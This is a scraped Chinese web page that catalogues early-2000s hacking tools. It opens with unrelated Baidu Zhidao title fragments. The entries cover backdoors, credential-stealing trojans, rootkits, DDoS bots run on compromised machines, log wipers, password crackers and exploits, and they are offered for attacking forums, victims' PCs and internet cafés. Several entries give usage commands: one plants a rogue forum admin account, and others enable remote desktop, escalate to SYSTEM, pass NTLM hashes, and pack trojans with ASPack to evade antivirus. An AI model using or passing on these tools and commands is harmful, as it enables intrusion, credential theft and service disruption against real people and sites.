求两个软件，跪求！！！！_百度知道我说啥了（系统版本：iOS8.1.2，客户端版本：v6.6.2.516）_百度知道黑客软件介绍
命令行后门类winshellWinShell是一个运行在Windows平台上的 Telnet服务器软件，主程序是一个仅仅5k左右的可执行文件，可完全独立执行而不依赖于任何系统动态连接库，尽管它体积小小，却功能不凡，支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等…《入侵NT中winshell的使用》GinaGina木马的主要作用是在系统用户登陆时，将用户登陆的名字，登陆密码等记录到文件中去，因为这个DLL是在登陆时加载，所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户…儒Wollf1.5 我们的一位女黑客写的软件，扩展Telnet服务，集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}***************
*******菜鸟扫描软件！20CN IPC 扫描器正式版全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能
够探测流光探测不到的一些用户…（中文版）网络肉鸡猎手一个快速查找网络肉鸡的小工具网页信息神探使得网页不再有秘密，各种信息一目了然，什么电影、图片、Email地址、文章、
Flash、压缩文件、可执行文件…等等的链接地址无处可藏！连续而快速下载各
种软件、打包教程、VB、VC、动画教程、Flash、电影、写真图片
***************
***溢出工具
封包包括SQL2.exe SQL蠕虫听过吧，就是的这个漏洞！
NetScanTools 一款功能强大的网络工具包…（英文版）
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序，内含 源代码。
小紫V2.0追加版软件说明：直接覆盖2.0的xiaozi.exe即可。独立也可使用，只是没了LB.EXE
小紫V1.0推出，能黑注册信息小紫V2.0推出，加入噩梦之吻功能，能黑主页，分类，自定义文件小紫V2.0追加版推出 加入LB.EXE，可以获得论坛管理员权限小紫V3.0推出 补加可以黑欢迎短讯功能
程序包含文件：xiaozi.exelb.exereadme.txt
此软件只对LB论坛有效此软件是20NT浪心原创作品此软件需要VB6.0运行库的支持如：我们要黑在轰炸目标里写http://sundreamer.51.net/cgi-bin/在输入你要说的话：注意，在回车的地方输入&br&OK。点攻击就好了，在点查看黑页看你的成果吧如果不成功，在确定没写错的情况下，说明对方已经打上这个补丁。不过现在看来成功率还是很高的：（
噩梦之吻是浪心扩展的一个恶意破坏功能，威力之大，对网站将是致命的打击使用方法：首先确定对方是否是绝对路径判断方法http://sundreamer.51.net/cgi-bin/leoboard.cgi这样的路径是绝对路径这样的就不是绝对路径我们先要选上绝对路径（前面打钩）然后选择&黑它分类&点噩梦之吻。在查看黑页，我们发现，他所有的分类都进不了了&黑他主页&我就不多说了我们如果要黑http://sundreamer.51.net/cgi-bin/fight.cgi 这是论坛的比武游 戏我们点，我要自己定义 在输入文件里选择fight.cgi。在点噩梦之吻。OK：）要http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi就要把绝对路径前的钩去掉就好：）
小紫追加版功能 比如目标论坛/lb/cgi-bin/leoboard.cgiCMD下进入lb.exe所在目录运行命令 lb.exe -h/ -p 80 -b E:/website/lb/cgi-
bin/ -w /lb/cgi-bin说明
80为端口 E:/website/lb/cgi-bin/ 为论坛说在主机的绝对路径 /lb/cgi-bin为论坛路径 一但成功，自动加入帐号密码都为hack的管理员
LB5论坛轰炸机 简介：LB5论坛轰炸机(修正版)2.0说明:一、修正了第一版在很多机器不兼容，导致不能使用的问题。现支持各种Windows 类的操作系统；二、增加了多线程、多用户同时轰炸的功能（同时可以支持4个线程），攻击效率 是第一版的四倍，同时开启4个线程的使用方法为：1.本软件为免费软件，但首先在天龙论坛内注册用户。连接地址在
t中找。（注：不注册不能使用）2.在预炸论坛内先注册4个用户。（如：炸弹1、炸弹2、炸弹3、炸弹4）3.在程序中输入这4个用户及密码。4.输入预炸论坛的论题连接地址。（例如:http://*.*.***/cgi-bin/forums.cgi?f orum=2）在4个线程的地址框中可以输入同样的也可以输入不 一样的，作用分别为4线程同时炸一个论题和4个线程分别炸4个不同的论题。5.分别点击4个确定按钮，此时即可开启4个线程。（开启1－4个线程的方法同理。）三、对轰炸的内容已无限制，增加了开始数值的设定，降低了重贴率。
MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机（其实不局限于MSN 的），它具有超
快的攻击速度，据测试，在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而
且软件体积极小，有效节省系统资源…（DameWare NT Utilities v3.71.0.0 注册版这是一款功能强大的Windows NT/2000/XP 务器远程控制软件，只要拥有一个远程主机的管理帐号就能使用它远程GUI下登陆交互控制主机…
柳叶擦眼这个小软件可以列出系统所有的进程（包括隐藏的），并可以杀死进程.这个是共享软件…（中文版）《让传奇木马走开》
XdebugMicrosoft Windows内核消息处理本地缓冲区存在溢出漏洞详细请看 运行xDebug.exe，成功后会以SYSTEM权限运行ey4s.bat
scanipc这个是木头见过的最傻瓜化的入侵软件了，只要设置好你要上传的后门和IP范围 ，它就会开始工作了，界面简单实用，全自动IPC扫描器，可以同步植入木马，可 以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户 …
elsave.exe榕哥日志清除工具
LC4可以检测用户是否使用了不安全的密码，是最好，最快的Win NT/2000 workstations 密码破解工具，目前这是最新版本.它宣称：在P300机器上不到48 小时可以破解90%的超级用户(Admin)口令.8%不到10分钟就可以破解出来 …
DDOS控制大量Server进行DDoS的工具，支持4种攻击方法：SYN、LAND、FakePing、狂怒之Ping，危险程度高，慎用。程序分为Client和Server，Server在肉鸡上执行后会自动***为NT服务程序并删除自身，以后将会采用NT Service方式在肉鸡上作为木马运行，可以Telnet/HTTP 控制，方法：直接在IE输入
即可。Server端自动兼容系统环境，在98/Me/2000/XP都能***，98/Me下能发起狂怒之Ping攻击，2000/XP下能使用所有功能。
WEBD***通用版
iis5sp3默认解压为或者www.kyzj.net
IECookiesView1.5可改写cookies信息，有此工具进行cookies欺骗就简单多了，
HackPass.exe帮你获得UserID和MD5码,破解MD5码软件分两个可执行文件： DVGetPass.exe 是用来得到用户名和密码。 HackPass.exe 用来破解MD5码。 HackPass.exe破解MD5 的速度比较快我作了一个测试： 3600个用户，选暴力破解模式 20分钟 破了1021 个6位数字的。如果挂字典 ，3秒钟破解 所有的密码为000000的用户，：）
v1.77 注册版这是一款强大有力的可以帮助你更好管理计算机和网络的工具，具有Ping、检测 打开的端口、检测Netbios names/User name/MAC (Ethernet) vendor、共享、NT Services、Local Groups、Global Groups、检测远程系统时间等功能。
netsvc.exe 控制远程
NT服务的Ntreskit程序
铁血-Open3389
V1.1完全用批处理写的远程开启3389服务的工具。不依赖管理共享了。tx3389.bat [IP] [用户名] [密码]tx3389.bat [肉鸡文件]如果指定肉鸡文件批处理将从文件中读取ip 用户名 密码肉鸡文件的文件格式为ip 用户名 密码。空格隔开。例1：tx.0.2 user &&例2：tx3389 file.txt肉鸡文件格式如下（空格隔开）：192.168.0.1 user &&192.168.0.2 administrator 123192.168.0.24 administrator admin
Server 2003
的3389终端登录器Server 终端登录器，是从Windows Server 2003中提出的
open3389.rar一个好用的开3389的小程序，比起HBULOT djxyxs ，open3389要好用多了，程序
一运行，电脑马上重起，程序经压缩处理后只有31k，原代码来自红客联盟，本程
序在win2k server ，win2k Advanced Server上测试通过
arpsniffer
榕哥写的arpsniffer交换环境下的嗅探程序已经出到0.5了,这个版本最大的好处
就是内置了路由功能,不再需要更改系统配置实现。
DebPloit Win NT/2000权限提升工具，可以将任意用户提升到SYSTEM级别的权限
。漏洞出在smss.exe中的DEBUG子系统，所有普通用户都可以通过该漏洞获得对系
统中任意进程或线程句柄的控制，从而可以以SYSTEM或管理员权限执行任意命令
。2、使用方法：假设我们已经获得一台机器上的一个GUEST用户（或其他普通用
户），现在我们要这个工具来获得系统最高权限。进行如下步骤：把ERunAsX.exe
和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下，例如C:\下。以
GUEST身份运行&ERunAsX 要执行命令&，例如&ERunAsX cmd.exe&，这时执行的命
令是以SYSTEM 权限运行的…（请注意：具体使用以软件内英文说明为准，内附
该BUG解决办法），执行环境：Windows NT 4.0/2000（SPs在之前）
fscan v1.0
一个anti IDS的cgi扫描工具。
FScan112WinNT的快速端口（TCP、UDP）命令行扫描仪，扫描速度超过每秒200个。
idahack ida溢出
idq.dll利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效，也是很棒的web后门)
ispc.exe idq.dll连接客户端
MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 远程溢出
psexecpsexec是一个类似于TELNET和PCANYWHERE的工具，允许你远程在WINDOW下执行任
意程序，可以不设置客户端直接执行。
reboot.exe
NT下的一个重起程序。
SqlExec天行软件最新公开推出 MS-SQL Exec for NetHackerIII软件,SQLExec 软件用于
远程MS-SQL服务器上执行MS-DOS命令。SQLExec是标准的Win32 GUI程序，自动修
改系统注册表，设置成TCP/IP连接数据库方式。并可以保存执行结果。
GUI界面的优秀扫描器
SYN潜伏攻击者为Lion SYN写的扩展GUI界面，实现了隐藏攻击的功能。
wget极好的命令行断点续传工具，功能极强。1.8.2Windows版，支持HTTPS和改进的文件名处理方式，避免了在Linux平台下能
正确处理下载文件名而在Windows下出错的问题。
win2k+sp3配置的权限提升程序(不错!!!) *
Fssniffer Client 1.0程序是在Visual Basic6.0上开发的，所以需要msvbvm60.dll。这个工具是用来连 接Fs Sniffer(不会没听说过吧，是小榕的一个***器，运行在远程肉鸡上，可以探测到对它的连接的密码)功能确实很棒，但由于密码很多。所以在察看结果的时 候常常会无法记住。而且并没有保存功能。这里并不是说小榕的软件不好哦，只是小榕可能工作繁忙，加上&流光&开发任务大。可能一时忙不过来。在这里，我们当然还要感谢一下小榕开发的fssniffer。没有fssniffer，也就没有这个 client了。呵呵，废话一大堆，现在来讲一下如何使用吧： 1）界面很简单。你
输入肉鸡的ip和你绑定fssniffer的端口。按下连接。程序则会连接到你的肉鸡了 。 2）然后输入密码，一旦连接上，你就可以用&进入&按钮，进入机器。 3） 如果密码正确，回显框中就会顺利出现fssniffer的欢迎界面。 4）点击显示结果
。会在回显框中显示出密码。当然，这时你可以按下&停止显示&。程序在这个 时候应该不会死机。 5）点击浏览按钮。选择目录。输入文件名。点击确定。 6 ）然后按保存按钮。如果顺利保存。会出现提示的。这样你就可以慢慢的看你***到的密码了。平台：WindowsNT/2000
xptscWIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPscreen.width-366)this.width=screen.width-366& border=0&ort
MsSqlHackMS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 远程溢出
SQL的扫描探测工具集合，包括：SQLPing,SQLScanner,SQLCracker,SQLDos等。
hgodHGod V0.51—-HUC DoS Tool V0.511. 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项。2. 只运行在Win2000/XP以上版本的Windows系统里。3. 能够用来测试网络安全产品或者常见操作系统的抗拒绝服务性能。4. 经过测试SYN Flood能够达到每秒50000个连接请求。5. 杀伤力强大, 一个SYN Flood线程足以让Win2000 IIS连接数占满而无法访问。6. 使用参数比较多, 自己慢慢摸索, 请不要使用本软件用于破坏行为。
0.51 版功能改进:1. 增加了ICMP/UDP/IGMP Flood发包时的随机产生数据包大小的选项。2. 调整了SYN Flood的线程参数及延时控制。
aspcode针对IIS的ASP溢出漏洞已编译好的两段代码，有什么用，想你应该知道，可以试试.screen.width-366)this.width=screen.width-366& border=0& 为避免此漏洞和其他已知漏洞,请尽快***windows2000SP3。
rootkit运行于Windows下的rootkit，能够隐藏进程、开TCP/IP后门、实现内核级shell，
还具有键盘Sniffer的功能。最可贵的是，它还提供了程序源代码。平台:WinNT/2000
Xscan一款强大的扫描软件，可以和流光相媲美 采用多线程方式对指定IP地址段（或单机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式，扫描内容包括：远程操作系统类型及版本，标准端口状态及端口BANNER信息，SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SQL- SERVER、FTP-SERVER、SMTP-
SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息、注册表信息等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。 增SSL 插件，用于检测SSL漏洞；升级PORT、HTTP、IIS插件…（
x-way2.5采用多线程形式对服务器系统进行漏洞扫描和安全测试工具，X-WAY多个版本均在 Win2000下开发，建议用户使用时候也在Win2000环境，以发挥最佳效果…（中文 版）《扫描工具，别忘了x-way2.5》
下面的软件本来不想收进来给大家看，因为顶级黑客不入侵个人电脑，基本不用 别人写的木马，肯定是人手一个（自己编写的木马）没有任何杀毒软件能查出来的。***************
使用木马改造工具：
ASPack这个是使用木马都一定要会用的工具，它能压缩木马，不让杀毒软件查出来！
3389.rar 终端服务***工具内含终端开启（bat/vbe/exe）、终端连接、端口修改等工具
另外MagicKing 说的上面的Xscan_gui太久了..现在放个新的上..不用发EM给我.Xscan_gui2.30高级扫描器
扫描监控NetXRayNetXRay 是由Cinco Networks公司开发的一个用于高级分组检错器，它具有图形和表格的作用，可提供分组获取和译码的功能，主要特点：1、客户机/服务器结构允许连接到另外机器上的其他拷贝，以实现远程监控。2、Trigger（触发器）可发出基本错误、应用或者任何其它网络特性的状态报警。3、Packet Generator（分组产生器）允许在特定情况下加载网络，你能够测试网络在重负载下的能力，也可以利用分组产生器来发送常规（或者伪造、你可千万别乱来哦）的分组。4、还可以截获以太网桢及其中所含的数据。NmapUNIX下的著名扫描器Nmap的windows版本Shadow Security ScannerShadow Security Scanner 5.37 俄罗斯安全界非常专业的安全漏洞扫描软件，功能极其强大…支持在线升级。cis-5.0.02小而使用的扫描器，可以扫描unicode和cgi漏洞。TWWWSCAN1.2TWWWSCAN的最新版本1.2（出品）可以扫描400多个www/cgi漏洞。此版本在WIN95 OSR2, WIN98,WIN98SE,Win NT4,Win 2k/Me 下可正常使用
口令破解黑雨–POP3邮箱密码暴力破解器一个POP3邮箱破解工具，使用深度算法、广度算法、多线程深度算法等一系列先进的算法达到快速的破解，是个不错的POP3破解器溯雪溯雪 Beta 7 英文版 基于WEB的探测器 For Win98/NT/2000溯雪Beta 7 中文补丁 NetMonkey 汉化溯雪Beta 7 中文补丁 NetMonkey 汉化（请先按***英文版，释放到原英文版目录即可）黑客字典II中文版 200K Name:Banyet Codescreen.width-366)this.width=screen.width-366& border=0&8G22M乱刀1.25SE乱刀1.25SE Unix Password Killer
源程序库LINUX0.01源代码LINUX核心0.01版的源代码，这是个有纪念意义的Kernel,当年Linus写的就是这个，最为原始的一个LINUX，建议所有的人都该拉下去看看，不大，只有71KBMS-DOS6.0完整源代码Microsoft MS-DOS6.0 完整源代码，包括所有外部命令，***程序，DOSSHELL等。每个源文件均包括开发历史、更新说明、注释。这样一套源码对你的意义，实在无法以笔墨形容。
其他NetDemon网页源代码察看器查看所有禁止查看源码的网站的页面源码，检查网页是否存在恶意代码，防止受到 java炸弹等的袭击，如果人家告诉你一个网址，你担心是否有炸弹等陷阱时，你可先用此工具检查其内容，确定没事之后再用IE等浏览器浏览.查看服务器的类型，在文档头的server中显示，由此也可判断服务器的操作系统类型20CN Mini Ftp 服务器随着宽带上网的人越来越多，朋友之间的文件共享与交流成了一个问题，用QQ MSN之类的传送吧，很不方便，速度也是一个问题，装个Server-U吧，似乎夸张了点。而且说不定给你弄个漏洞出来，危害到你电脑的安全，这就不好了嘛。而这个20CN MINI FTPD 正好满足你的要求。很小的个头，很绿色。有需要时打开，不需要的时候关闭，当然也可以选择适当的目录，永久性的共享给你的朋友。把用户名和密码告诉你的朋友，他们就可以随时来下载你分享给他们的东西了。Windows Media服务远程溢出程序Windows Media服务nsiislog.dll远程溢出程序ByPassFireWall这是一个测试突破防火墙得到一个Shell的程序。详细使用方法见Readme.txtWinEggDropShell V1.38插入到任意进程中运行的后门程序。 lsass,svchost,smss等进程都能插入。使用前先好好看一下EditServerReadme.txt,如何配置后门以及要注意些什么的事项，都在这个说明文件。详细的命令说明就请看Readme.txt20CN远程控制软件本远程控制软件为客户连接的反弹方式，由客户主动连接服务器，通信方式为HTTP隧道，可以控制局域网内部的机器，控制功能包括文件操作，磁盘操作，注册表编辑，屏幕监控，窗口管理，进程管理、服务管理、文件查找等大部分功能远程控制功能，能开启终端服务，关闭、重起机器，能自卸载。文件传输支持断点续传。作者：shesh 最新版本：1.01。 最近功能更新：见Readme文档。最近更新日期：网卡MAC地址修改程序可以在NT/2k/xp下修改指定网卡的MAC地址，至于修改MAC地址有什么作为，那视乎自己的需要的，搞那些MAC spoofing或在网络中检测建立的网络的routing table等都会用到的。由于列出系统mac地址的功能使用的api在win9x下不支持，所以程序在win9x下并不支持的。注意：本程序并不能物理性的直接修改网卡ROM中的MAC地址，而是通过修改注册表中的数据来欺骗操作系统。PortLoggerV1.2用来监视某一个特定的TCP端口的连接情况，并将连接写入文件的程序。CleanIISLogCleanIISLog IIS 日志处理工具，可以不留痕迹地清除指定的IP连接记录。
现在放上的是&加密解密&的一些软件….当然不可能把现在所有的都放上如果各位还需要哪些&加密解密&请告诉.我会尽力帮你们找的….
Cain v2.5 beta38 for NT/2000/XPCain v2.5 beta38 for NT/2000/XP这是一个可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码等综合工具，还可以远程破解，可以挂字典以及暴力破解，其sniffer功能极其强大，几乎可以明文捕获一切帐号口令，包括FTP、 HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、 RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等，目前已经提供对Winpcap v3.0支持。
Venom Windows Binary v1.1.5是一款利用Windows Management Instrumentation (WMI)服务通过字典破解Windows密码的工具。在Server服务已经被禁用的情况下，它依然有效。其破解速度可调，但是大约是在45~50次猜测/秒。密码字典支持%username% 与 lc %username%以及用户名即为密码方式。&lc&前缀是自动转换用户名为小写。
黄金眼1.1破解&金梅电影&那套程序的管理员名和密码的东东，在google上搜索了下，随便找了两个站，结果都进去了 screen.width-366)this.width=screen.width-366& border=0&，因为得到的管理员权限，所以请网友们进去不要搞破坏，有电影看就行了。
无盘克星0.47
xsbClear.zip小哨兵密码清除工具，我机上没有环境，没法试，不知有没有效。
Serv-UPassCrack v1.0a本软件通过字典破解serv-u ftp密码输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到正确的密码。 如：D:\public&cscript crack.vbs ib0ADE8D1FF316C1BA75105AMicrosoft (R) Windows Script Host Version 5.6版权所有(C) Microsoft Corporation 。保留所有权利。
*******************Serv-UPassCrack v1.0aServ-U FTP PassWord Cracker by Caine, Thanks to DjpowerUsage:cscript crack.vbs ServUPass/h: this usage.CAUTION:!!!!Wordlist must in Dict.txt file!!!!*******************
0ADE8D1FF316C1BA75105A=testFinished!! Goodluck.
Dialupass v2.0这个程序可以列举出电脑中所有拔号程序的帐号，密码及登录域，在某些场合可能有用。
字典专家.BBSt 5.4.4一、字典专家.BBS(t) 4 新增功能：1.支持网址密码与姓名密码输出的功能.
二、使用说明：1.本软件使用十分简单,首先,输入所需段数,然后点击’刷新(Refresh)’键,本软件就会根据您输入的段数,打开相应数目的项.第二步,选择输出的密码档位置和输出方式.最后,点击’生成(Begin)’按钮就可以了.如果要分割生成的字典档,只需在按下’生成(Begin)’按钮之前,将每个字典档密码数量改为相应数值即可.2.前一版本的密码生成器使用:只需选择好保存位置、关键字和输出位数(不包括前缀和后缀位数),是否需要前缀或后缀,然后点击生成即可.生成结束后,它会报告所生成的密码总数,并把总数加到刚生成的密码文件最后面.注意:如果选择’自定义’输出,在编辑框中输入字符或字符串,然后点击右边的’Add’按钮,就可以把输入的字符或字符串加入到列表框中.★双击某一项可将其从列表框中删除.
三、功能列表：1.生成特殊形式的密码.如:由某几个字符不停变换的密码.2.提供’观看’功能.当密码档文件生成之后,你可按下此按钮来查看它.3.利用本软件,你可以编制任意形式的密码(1–16段).4.前一版本的密码生成器以按钮’其他’的形式提供.
RainbowCrack 1.01一个快速破解NT密码的东西，它的原理不是暴力破解，而是通过查询预先做好的密码与密文一一对应的文件来快速破出密码，优点是速度快，缺点是生成的文件非常大。具体使用请看说明文件。
Tups 1.22Tups 1.22 [For NT/2000/XP]一个NT下的全功能工具,对单一主机NT,ftp,pop3账号进行扫描和破解,对SunOS的finger获取用户列表,以及port扫描,单行ftp传输,日志清除，……
Advanced Intuit Password Recovery v1.24Advanced Intuit Password Recovery v1.24破解版Advanced Intuit Password Recovery 是一款用来取回丢失或者是以往的密码的工具，支持多种密码格式!支持Quicken (*.QDI, *.QDB, *.QDF),Quicken Lawyer (*.PFL) and QuickBooks(.QBA, .QBW) files.多种文件格式!
pass.rar破解硬盘还原卡的东东，我机上没有还原卡，没法试，不知有没有效。
Advanced Money Password Recovery v1.11Advanced Money Password Recovery v1.11 破解版「AMPR」是专为微软 Money 程序所设计的解密程序，可以帮你找回忘记的密码。如果你手边有以前的档案，却因为密码忘记而无法开启，你不妨来试试「AMPR」的威力。
MONSTER字典V4.0功能更加强大的字典工具，此版本较之前的版本中增加了字典合并和拆分功能
ntpwkit.rarNT PW Kit就是那个可以直接从软盘或光盘引导到一个Linux，然后直接修改windows nt/2000 administrator口令的东东。由于Linux对NTFS文件系统的支持，以及这种方式的危险性，本工具可能会造成系统账号信息丢失，请慎用之，任何人不会对此负责。
Pubwin4 幽灵Pubwin4 幽灵，支持清除网吧管理软件Pubwin4 的管理密码，当然也支持还原密码，针对会员还可以使用清除计费软件功能。
天龙还原精灵卸载器天龙还原类软件卸载器本程序有1.0 FOR 98 和 2.0 FOR NT/XP两个版本其中,1.0只是将一个备份的MBR写进主引导区,因此,可能有一定的危害,比如如果你***了第三方的多引导程序,或者你***了非WIN系统,都会造成危害,因此如果你使用时请仔细考虑,一切后果自负2.0在1.0的基础上有所改进,程序将自动分析你的系统是否***还原类软件,如果***就卸载,并且恢复成你***还原软件之前的主引导区,如果你的系统没有***将什么多不做,所以比1.0安全
SAMInside 2.1暴力破解NT密码（LMHash/NTHash ）的软件，该软件没设字典功能，而是从你选定的字符里组合去破解你得到的LMHash/NTHash，且可以同时对几个LMHash/NTHash进行暴力破解，速度不受影响。我试了下，用abc123作为密码，字符用abcdefghijklmnopqrstuvwxyz，结果大概10分钟破出密码，如果机器配置高一点的话那效果应更好。
MD5 for winfor win的MD5暴力解密工具。由于 MD5 是一种不可逆的编码算法，因此要&还原&出原始密码就只能用穷举法（暴力法）了。本程序使用了公开的 MD5 算法模块，在P4-1.5G的机器上一秒钟可以尝试约20000个号码。另外本程序还带有四个实用的密码字典。
DeMD5 for linux用C语言写的破译 MD5 的程序：破解速度可以达到约 100 万次/秒 ，在P4-1G的机器上：破解 8 位数字的密码最长时间需要 100 秒。破解 8 位字母的密码最长时间需要 60 小时左右。本程序在 Linux/FreeBSD 下运行
ADump v1.2Windows NT/2K Password Dumper感觉与findpass作用差不多ADump -d 显示用户名及密码ADump -f [filename] 把用户名及密码写入指定文件
htm工具可以加密解密你的htm文件
PasswordViewer V2.01PasswordViewer 是一个集察看屏保口令、Access数据库口令、CMOS口令、QQ2000口令、美萍网管口令、Win9x共享口令、Win9x缓存口令的软件，他同时附带了支持Win2k的星号探测器。
动网密码全攻略帮你获得UserID和MD5码,破解MD5码软件分两个可执行文件： DVGetPass.exe 是用来得到用户名和密码。 HackPass.exe 用来破解MD5码。 HackPass.exe破解MD5的速度比较快我作了一个测试： 3600个用户，选暴力破解模式 20分钟 破了1021个6位数字的。如果挂字典 ，3秒钟破解 所有的密码为000000的用户，：）
mysqlfast.zip一个高速mysql密码暴力破解器，速度很快,但也很占资源。A high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character
password containing any printable ASCII characters in a matter of hours. By Secret Squirrel
uan.zip本软件是一个可以在局域网发生特效的木马软件,(不含病毒,就算有杀毒软件也是无可奈何)下面是本软件的使用步骤让我们先来打开本软件,然后看的界面就是这样了,然后点一下[扫描],然后稍等片刻就会出现在局域网里所有***传奇游戏的计算机上的IP了,然后用鼠标点一下那 IP就可以确定那个机器了，后面的事情就是怎么往他的机器里加栽木马了，如果对方有防火墙之类的软件，那也不要怕，我们就来点一下按钮[如果对方有防火墙请点击这里]就哦K了。《运行环境windowsXP》本软件是一个可以偷邮箱而且炸邮箱的软件，用法很简单，先添上邮箱的用户名什么的，再选择好字典文件，还有的就是别忘了按那那个开始破解的按钮。下面的是往指定的邮箱发送垃圾信件，这个和上面是一样的都可以用代理的IP先把代理的IP和端口添好，然后再填上你的邮箱地址（可以瞎填，但不可以不填）还有的就是发信主题，最后别忘了按确定发送哦。^_^*详细请看说明。
Share Password hacker利用的Win9x共享口令的脆弱缺陷破解密码的程序。和PQwak相似,只是这个是命令行下的.例: Hackit.exe 192.168.0.1 xiaoli c 8以8位密码破解IP地址为192.168.0.1主机名为xiaoli的共享目录c的密码。
激活专家激活专家–风飘雪作品现在好多软件在***时要输入序列号才能继续，也就是说，你不输入序列号，则《下一步》这个按钮是灰色的。你无法点他，嘿嘿，有了这玩意，XXX在你的名柄那里输入 下一步， 并点激活，（输入时可能显示乱码，但不理他）哈哈，你将畅通无阻！！！这玩意对付一般的软件，包括瑞星现在出的***下载版，没有任何问题！也就是这是一个极通用的工具！！！！
还原精灵全版本密码读取工具本程序为还原精灵密码读取工具，为管理员丢失密码时使用，莫用于非法用途，否则后果自负。本程序不可用于NT内核的操作系统。你可以选择不使用该程序，但使用该程序的一切后果和给你带来的失望，本人不承担任何责任！提示：如密码中存在不可见字符，可进入命令提示符状态，用输出重定向符& &&将程序的输出结果输出到一文本文件当中，复制文本文件中的password即可。如读取不成功，请重新启动计算机再次运行！
NTscan 1.0 汉化版NTscan 1.0是一个支持IPC$, SMB, WMI 扫描的NT弱口令猜测工具。
ntxp2k-cracker.zip一个NT/2k/XP密码暴力破解批处理脚本，先是通过pwdump2.exe把sam文件dump到pass.txt中，再用john.exe进行暴力破解。可把文件解压到软盘上，在对方机上执行a:\qd，然后抽回盘到自己的机器上，copy到硬盘里再执行crack.bat进行破解。当然这个方法对不能接触对方机器是没有用的
MDcrack 1.2MD5广泛用于加密和解密技术上，在很多操作系统中，用户的密码是以MD5值（或类似的其它算法）的方式保存的，用户Login的时候，系统是把用户输入的密码计算成MD5值，然后再去和系统中保存的MD5值进行比较，来验证该用户的合法性，此加密法为不可逆的。此软件就是用来解开那段加密码后的MD5值的，支持MD4/MD5/NTLM1,速度不错。
VNCPwDump V0.0.1VNC是一款远程控制软件,与pcanywhere一样它在网络中使用非常广泛,能运行于Linux, Solaris,Windows9x/2000/NT及Macintosh等系统中,默认端口为5900.这个程序可以获取VNC的连接密码,提供多种获取方式,比如:从NTUSER.DAT文件中获取,从命令行输入获取,注入VNC线程获取等方式.压缩包中含源代码.
SMBproxy V1.0.0如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.使用方法:
1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口
net stop server
2. 运行本程序
smbproxy -s -f
3. 通过本地代理登陆远程主机
net use * 7.0.0.1\c$ /u:administrator
程序只认可pwdump格式的密码信息,LC格式不行. 压缩包中提供了转换工具(username:userID:LM hash:MD4 hashIMG]http://www.netxeyes.org/image/bbs3000/angel_smile.gif[/IMG]IMG]http://www.netxeyes.org/image/bbs3000/regular_smile.gif[/IMG]admin:1003:CCFDB453AAD3B435B51404EE:3DBDE697DBEB
NT Crackpwdump2从系统SAM数据库中获取用户信息，保存为以下格式(username:userID:LM hash:MD4 hash) NT Crack就是利用pwdump2获取到的MD4 passwd hash破解帐号密码，比较经典的工具。压缩内含pwdump2
MSN Password Recovery v2.00该程序用于恢复你遗忘的MSN Messenger 口令，它通过从注册表和暴力破解的方法恢复口令，正确率在100%。
特殊密码制作程序这个程序能做出一个特殊的密码，起到了防盗的作用。很简单，但却很实用。
AIMPR 1.61 零售版Advanced Instant Messengers Password Recovery 1.61 零售版，这是一款实时通讯软件存储在本机的账号密码恢复工具，如 ICQ, AOL IM, Yahoo! Messenger, MSN Messenger, Excite Messenger, Odigo, Trillian,AT&T IM Anywhere, T-Online Messenger, Match Messenger, Praize IM, ScreenFIRE, ACD Express comunicator, Imici Messenger, Prodigy IM, PowWow Messenger, Jabber IM, Kellster IM, PalTalk,
Indiatimes messenger, Miranda, Tiscali, Ya.com Messenger, Rediff Bol, Sifty Buzz, Devil, TencentQQ…支持多种语言口令的恢复。所破解的QQ 为.cfg文件，不知道是哪个版本了，反正我试了0825版没成功。
Outlook Express Email Snooper v1.2注册版Outlook Express Email Snooper v1.2，是一个可以帮助你刺探那些有口令保护的outlook express 账户信息的软件。
WINNT/2000/XP登录口令破解器 V030126WINNT/2000/XP的administrator的密码忘记了，怎么办？一张软盘就能搞定！ 这可是日最新发布的版本哦。
AIMPR1.50 汉化破解版Advanced Instant Messengers Password Recovery 1.50 (汉化破解版)是一个密码恢复软件, 用于恢复即时通讯软件的登录和密码信息, 支持的网络寻呼机包括: ICQ, AOL Instant Messenger,Yahoo! Messenger,Excite Messenger, MSNMessenger, Odigo, Trillian, AT&T IM Anywhere, T-Online Messenger, MatchMessenger, Praize IM,ScreenFIRE, ACD Express Comunicator, Imici Messenger, Prodigy IM, PowWow messenger, Jabber IM, Kellster IM, PalTalk, Indiatimes messenger, Miranda, Tiscali, Ya.comMessenger, Rediff Bol, Sify Buzz, Devil, Tencent QQ. 其中包括了我们经常使用到的 QQ, MSN Messenger 和 ICQ.
